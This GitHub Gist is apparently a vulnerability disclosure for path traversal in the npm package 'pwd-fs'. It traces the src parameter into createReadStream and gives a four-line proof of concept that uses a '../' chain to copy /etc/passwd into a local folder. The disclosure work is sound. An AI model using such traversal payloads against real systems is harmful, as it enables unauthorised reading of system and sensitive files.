Created
July 17, 2023 20:27
-
-
Save miguelafmonteiro/5da80d85aaa9492fd3db59b05bfd6e96 to your computer and use it in GitHub Desktop.
Affected versions of this package are vulnerable to Path Traversal as the attacker controlled parameter src (recurse-io.js#L74) flows into a sensitive file system API createReadStream (recurse-io.js#L113). As a result, attackers may read sensitive content they are not supposed such as /etc/passwd..
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // must have a directory named dir/ in the same directory as poc.js | |
| const PoweredFileSystem = require('pwd-fs'); | |
| const pfs = new PoweredFileSystem(); | |
| pfs.copy("../../../../../../../../../../etc/passwd", "./dir") |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment